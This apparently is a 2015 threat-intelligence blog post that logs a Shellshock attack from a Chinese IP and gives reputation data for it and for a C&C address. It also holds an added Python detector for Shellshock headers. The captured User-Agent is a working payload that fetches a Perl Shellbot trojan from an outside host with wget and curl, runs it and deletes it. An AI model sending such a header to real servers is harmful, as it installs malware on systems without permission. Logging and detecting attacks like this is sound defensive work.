Monday, 12 October 2015

221.3.153.172 - perl Trojan via Shellshock - CC 69.89.2.153

BEGIN OF HTTP DATA:
2015-10-12 16:49:05
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET /cgi-mod/index.cgi HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://somere.ru/license.txt -O /tmp/license.txt;curl -O /tmp/license.txt http://somere.ru/license.txt;perl /tmp/license.txt ; rm -rf license.txt;rm -fr license.*");'
Host: 109.234.106.8
Connection: Close
ClamAV reports it as:

license.txt: Trojan.Perl.Shellbot-2 FOUND
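As an added example (not part of the original post), the following Python snippet shows the check a web log monitor would run over a request like the one captured above: it flags any header value that begins with the Bash function-definition prefix `() {` that the Shellshock bug keyed on, splits off the command string after the `};` terminator, and pulls out the download URLs and hosts, defanging them with the `[.]` convention the indicator listings in this post use. The sample requests are constructed from the capture above plus one made-up benign request for contrast; the function and field names are my own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed samples: the first is the captured request from the post (the perl
# source inside the header carries literal backslash-r backslash-n, so it is
# escaped as \\r\\n here); the second is a made-up benign request.
SAMPLE_REQUESTS = [
    (
        "GET /cgi-mod/index.cgi HTTP/1.1\r\n"
        "Accept: */*\r\n"
        "Accept-Language: en-US,en;q=0.5\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "User-Agent: () { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";"
        "system(\"wget http://somere.ru/license.txt -O /tmp/license.txt;"
        "curl -O /tmp/license.txt http://somere.ru/license.txt;perl /tmp/license.txt ; "
        "rm -rf license.txt;rm -fr license.*\");'\r\n"
        "Host: 109.234.106.8\r\n"
        "Connection: Close\r\n"
    ),
    (
        "GET /index.html HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/41.0\r\n"
        "Host: 109.234.106.8\r\n"
    ),
]

# Vulnerable Bash imported any environment variable whose value *begins* with
# "() {" as a function and then ran whatever followed the closing "};". CGI
# servers copy request headers into environment variables, which is why the
# check is anchored at the start of each header value.
SHELLSHOCK_PREFIX = re.compile(r"^\(\)\s*\{")
URL_RE = re.compile(r"https?://[^\s'\";)]+")


@dataclass
class Finding:
    header: str                  # lower-cased header name that carried the payload
    payload: str                 # everything after the "};" terminator
    urls: List[str] = field(default_factory=list)
    hosts: List[str] = field(default_factory=list)   # defanged, de-duplicated


def defang(host: str) -> str:
    """Replace the last dot, matching the 221.3.153[.]172 style used in the post."""
    head, sep, tail = host.rpartition(".")
    return f"{head}[.]{tail}" if sep else host


def parse_headers(raw: str) -> Dict[str, str]:
    """Map lower-cased header names to values; the request line is skipped."""
    headers: Dict[str, str] = {}
    for line in raw.splitlines()[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def inspect_request(raw: str) -> Optional[Finding]:
    """Return a Finding for the first header carrying a Shellshock prefix, else None."""
    for name, value in parse_headers(raw).items():
        if not SHELLSHOCK_PREFIX.match(value):
            continue
        _, sep, payload = value.partition("};")
        urls = URL_RE.findall(value)
        hosts = sorted({defang(u.split("/")[2]) for u in urls})
        return Finding(header=name,
                       payload=payload.strip() if sep else "",
                       urls=urls, hosts=hosts)
    return None


def scan_requests(requests: List[str]) -> List[Finding]:
    """Run the check over a batch of raw requests and keep only the hits."""
    return [f for f in (inspect_request(r) for r in requests) if f is not None]


if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(f"header={hit.header} hosts={hit.hosts}")
        print(f"  payload: {hit.payload[:60]}...")
```

Matching only on the leading `() {` keeps false positives low (the string has no business at the start of a normal header value) while still catching variants that change the function body; a broader IDS rule that looks for `() {` anywhere in the request will catch more but also trip on discussion of the bug itself.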

221.3.153[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/221.3.153.172
    Static Source: panwdbl.appspot.com
  • Comment: Listed in open blacklist
  • Reference: https://panwdbl.appspot.com/lists/openbl.txt


The hardcoded C&C address is

69.89.2[.]153

    Static Source: GeoIP data
  • Country: United States
  • ASN: AS20141 Quality Technology Services, LLC.
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/69.89.2.153